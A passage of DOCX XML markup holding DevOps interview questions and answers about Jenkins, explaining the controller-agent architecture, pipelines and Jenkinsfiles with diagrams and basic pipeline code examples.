        <w:t>Jenkins follows a Controller-Agent architecture. The Jenkins Controller manages job scheduling, pipeline execution, plugins, user authentication, and the web interface. Agents are worker nodes that execute the actual build, test, and deployment tasks. When a developer commits code, Jenkins receives a trigger, schedules the job, and assigns it to an available agent. The agent performs the required tasks and reports the results back to the Controller. This distributed architecture enables scalability, parallel execution, and efficient resource utilization. In enterprise environments, Jenkins is often integrated with GitHub, Docker, Kubernetes, SonarQube, and artifact repositories to build complete CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q510. What is Jenkins master-agent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Jenkins Master-Agent Architecture?</w:t>
        <w:br/>
        <w:t>Jenkins Master-Agent (Controller-Agent) architecture is a distributed build architecture where:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Master (Controller) manages and schedules jobs.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Agents (Workers/Slaves) execute the actual build, test, and deployment tasks.</w:t>
        <w:br/>
        <w:t>This architecture helps Jenkins scale by distributing workloads across multiple machines.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">               Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    v</w:t>
        <w:br/>
        <w:t xml:space="preserve">             GitHub/GitLab</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    v</w:t>
        <w:br/>
        <w:t xml:space="preserve">             Jenkins Master</w:t>
        <w:br/>
        <w:t xml:space="preserve">         (Controller/Scheduler)</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       -------------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |           |           |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v           v           v</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Agent-1     Agent-2     Agent-3</w:t>
        <w:br/>
        <w:t xml:space="preserve">   (Linux)     (Windows)    (K8s Pod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |           |           |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v           v           v</w:t>
        <w:br/>
        <w:t xml:space="preserve">   Build Java   Build .NET   Docker Build</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Jenkins Master Responsibilities</w:t>
        <w:br/>
        <w:t>The Master node:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Hosts Jenkins UI</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Stores job configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Schedules builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Manages plugins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Manages users and permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Allocates jobs to agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tracks build history</w:t>
        <w:br/>
        <w:t>The Master should ideally not run builds in production environments to avoid performance issues.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Jenkins Agent Responsibilities</w:t>
        <w:br/>
        <w:t>Agents perform:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Code compilation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unit testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker image creation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deployment tasks</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Agent-1 → Java/Maven Build</w:t>
        <w:br/>
        <w:t>Agent-2 → Python Build</w:t>
        <w:br/>
        <w:t>Agent-3 → Kubernetes Deployment</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>Step 1</w:t>
        <w:br/>
        <w:t>Developer pushes code to GitHub.</w:t>
        <w:br/>
        <w:t>Step 2</w:t>
        <w:br/>
        <w:t>GitHub webhook triggers Jenkins.</w:t>
        <w:br/>
        <w:t>Step 3</w:t>
        <w:br/>
        <w:t>Master receives the request.</w:t>
        <w:br/>
        <w:t>Step 4</w:t>
        <w:br/>
        <w:t>Master finds an available agent.</w:t>
        <w:br/>
        <w:t>Step 5</w:t>
        <w:br/>
        <w:t>Job is sent to the agent.</w:t>
        <w:br/>
        <w:t>Step 6</w:t>
        <w:br/>
        <w:t>Agent executes the pipeline.</w:t>
        <w:br/>
        <w:t>Step 7</w:t>
        <w:br/>
        <w:t>Results are sent back to the master.</w:t>
        <w:br/>
        <w:t>GitHub</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Master</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Build/Test</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Master</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Agent Connection Methods</w:t>
        <w:br/>
        <w:t>SSH Agent</w:t>
        <w:br/>
        <w:t>Master ----SSH----&gt; Agent</w:t>
        <w:br/>
        <w:t>Most commonly used for Linux servers.</w:t>
        <w:br/>
        <w:t>JNLP Agent</w:t>
        <w:br/>
        <w:t>Agent ----JNLP----&gt; Master</w:t>
        <w:br/>
        <w:t>Useful when the agent initiates the connection.</w:t>
        <w:br/>
        <w:t>Kubernetes Dynamic Agents</w:t>
        <w:br/>
        <w:t>Using the Jenkins Kubernetes Plugin:</w:t>
        <w:br/>
        <w:t>Pipeline Starts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Create Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Run Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Delete Pod</w:t>
        <w:br/>
        <w:t>Very common in GKE, EKS, and AKS environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>✅ Distributed builds</w:t>
        <w:br/>
        <w:t>✅ Faster execution</w:t>
        <w:br/>
        <w:t>✅ Parallel pipelines</w:t>
        <w:br/>
        <w:t>✅ Better scalability</w:t>
        <w:br/>
        <w:t>✅ Supports multiple OS platforms</w:t>
        <w:br/>
        <w:t>✅ Reduces load on Jenkins Master</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real Interview Example</w:t>
        <w:br/>
        <w:t>Suppose your organization has:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Java applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Python applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker builds</w:t>
        <w:br/>
        <w:t>You can configure:</w:t>
        <w:br/>
        <w:t>Linux Agent    → Java/Maven</w:t>
        <w:br/>
        <w:t>Python Agent   → Python/PyTest</w:t>
        <w:br/>
        <w:t>Docker Agent   → Docker/Kubernetes</w:t>
        <w:br/>
        <w:t>The Master schedules jobs to the appropriate agent based on labels.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Jenkins Master-Agent architecture is a distributed execution model where the Jenkins Master, also called the Controller, manages job scheduling, configuration, plugins, and the web interface, while Agents execute the actual build, test, and deployment tasks. When a pipeline is triggered, the Master assigns the job to a suitable Agent based on labels or availability. This architecture improves scalability, enables parallel execution, and reduces load on the Master node. In modern Kubernetes environments, dynamic Jenkins agents are often created as pods and destroyed after the build completes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q511. Explain Jenkins pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jenkins Pipelines</w:t>
        <w:br/>
        <w:t>A Jenkins Pipeline is a collection of automated steps that define the Build → Test → Deploy process of an application.</w:t>
        <w:br/>
        <w:t>Instead of manually performing tasks, Jenkins executes them automatically in a defined sequence.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Pipelines?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automate software delivery</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduce manual errors</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ensure consistent deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster feedback and releases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pipeline as Code using a Jenkinsfile</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typical Pipeline Flow</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Checkout Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Run Unit Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Code Quality Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Security Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Build Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Push Image to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Deploy to Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pipeline as Code</w:t>
        <w:br/>
        <w:t>Jenkins pipelines are usually stored in a file called:</w:t>
        <w:br/>
        <w:t>Jenkinsfile</w:t>
        <w:br/>
        <w:t>inside the application’s Git repository.</w:t>
        <w:br/>
        <w:t>This allows:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version control</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Code reviews</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reusability</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Auditability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Jenkins Pipelines</w:t>
        <w:br/>
        <w:t>1. Declarative Pipeline</w:t>
        <w:br/>
        <w:t>Simpler and recommended.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Building application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Running tests'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Deploying application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Scripted Pipeline</w:t>
        <w:br/>
        <w:t>More flexible and written in Groovy.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Test'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Deploy'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important Pipeline Components</w:t>
        <w:br/>
        <w:t>Agent</w:t>
        <w:br/>
        <w:t>Defines where the pipeline runs.</w:t>
        <w:br/>
        <w:t>agent any</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>agent {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    label 'docker-agent'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Stages</w:t>
        <w:br/>
        <w:t>Logical sections of the pipeline.</w:t>
        <w:br/>
        <w:t>stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Deploy') {}</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Steps</w:t>
        <w:br/>
        <w:t>Actual commands executed inside a stage.</w:t>
        <w:br/>
        <w:t>steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real CI/CD Pipeline Example</w:t>
        <w:br/>
        <w:t>GitHub Push</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Jenkins Trigger</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Checkout Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Maven Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>JUnit Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>SonarQube Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Trivy Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Docker Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Push to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ↓</w:t>
        <w:br/>
        <w:t>Deploy to Kubernetes</w:t>
        <w:br/>
        <w:t>Tools commonly integrated:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SonarQube</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trivy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pipeline Features</w:t>
        <w:br/>
        <w:t>Parallel Execution</w:t>
        <w:br/>
        <w:t>Run stages simultaneously.</w:t>
        <w:br/>
        <w:t>Build Backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ||</w:t>
        <w:br/>
        <w:t>Build Frontend</w:t>
        <w:br/>
        <w:t>This reduces build time.</w:t>
        <w:br/>
        <w:t>Manual Approval</w:t>
        <w:br/>
        <w:t>input 'Deploy to Production?'</w:t>
        <w:br/>
        <w:t>Used before production deployments.</w:t>
        <w:br/>
        <w:t>Environment Variables</w:t>
        <w:br/>
        <w:t>environment {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IMAGE_NAME = "my-app"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Post Actions</w:t>
        <w:br/>
        <w:t>post {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    always {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Pipeline Completed'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pipeline as Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reusable and version-controlled</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Supports complex workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy integration with DevOps tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster and reliable releases</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1–2 Minutes)</w:t>
        <w:br/>
        <w:t>A Jenkins Pipeline is a set of automated stages that define the software delivery process, such as build, test, security scanning, packaging, and deployment. Pipelines are typically written in a Jenkinsfile and stored in source control, enabling Pipeline as Code. Jenkins supports Declarative and Scripted pipelines, with Declarative being the preferred approach due to its simplicity and readability. In production environments, pipelines often integrate with GitHub, SonarQube, Docker, artifact repositories, and Kubernetes to automate end-to-end CI/CD workflows. This approach improves consistency, reduces manual effort, and accelerates software delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q512. What is Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Jenkinsfile?</w:t>
        <w:br/>
        <w:t>A Jenkinsfile is a text file that contains the definition of a Jenkins Pipeline written in Groovy-based syntax.</w:t>
        <w:br/>
        <w:t>It allows you to define your CI/CD pipeline as code and store it in the same Git repository as your application.</w:t>
        <w:br/>
        <w:t>This concept is called Pipeline as Code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use a Jenkinsfile?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version controlled with application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy to review through Pull Requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reusable and maintainable</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent pipeline across environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Eliminates manual Jenkins job configuration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Location</w:t>
        <w:br/>
        <w:t>The Jenkinsfile is typically stored in the root directory of the project.</w:t>
        <w:br/>
        <w:t>project/</w:t>
        <w:br/>
        <w:t>├── src/</w:t>
        <w:br/>
        <w:t>├── pom.xml</w:t>
        <w:br/>
        <w:t>├── Dockerfile</w:t>
        <w:br/>
        <w:t>└── Jenkinsfile</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Basic Jenkinsfile Example</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Building application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Running tests'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Deploying application'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>For a Java application:</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Checkout') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                git 'https://github.com/company/app.git'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Test') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'mvn test'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Docker Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'docker build -t app:v1 .'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        stage('Deploy') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                sh 'kubectl apply -f deployment.yaml'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Main Components of a Jenkinsfile</w:t>
        <w:br/>
        <w:t>1. Agent</w:t>
        <w:br/>
        <w:t>Specifies where the pipeline runs.</w:t>
        <w:br/>
        <w:t>agent any</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>agent {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    label 'docker-agent'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Stages</w:t>
        <w:br/>
        <w:t>Logical phases of the pipeline.</w:t>
        <w:br/>
        <w:t>stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {}</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Steps</w:t>
        <w:br/>
        <w:t>Actual commands executed.</w:t>
        <w:br/>
        <w:t>steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Environment Variables</w:t>
        <w:br/>
        <w:t>environment {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    APP_NAME = "myapp"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Usage:</w:t>
        <w:br/>
        <w:t>sh "echo ${APP_NAME}"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Post Actions</w:t>
        <w:br/>
        <w:t>Executed after pipeline completion.</w:t>
        <w:br/>
        <w:t>post {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    success {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build Successful'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    failure {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build Failed'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Declarative vs Scripted Jenkinsfile</w:t>
        <w:br/>
        <w:t>Declarative (Recommended)</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Build'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Scripted</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Jenkins Uses Jenkinsfile</w:t>
        <w:br/>
        <w:t>Developer Pushes Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>GitHub Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>Jenkins Reads Jenkinsfile</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>Executes Pipeline Stages</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>Build → Test → Deploy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
